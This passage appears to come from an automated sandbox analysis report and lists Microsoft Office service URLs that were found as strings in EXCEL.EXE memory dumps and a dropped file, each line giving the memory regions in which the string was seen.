    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abpYrnF
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://clients.config.office.net/
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/List
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/c
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies=/1l
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office3Y5nK
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cortana.ai
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiBearer
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cr.office.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://cr.office.comB
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com#
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com=
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comW
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.coma
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comy
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
    Source: EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesP
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aiBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aiG
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://directory.services.
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/4
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1CR
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
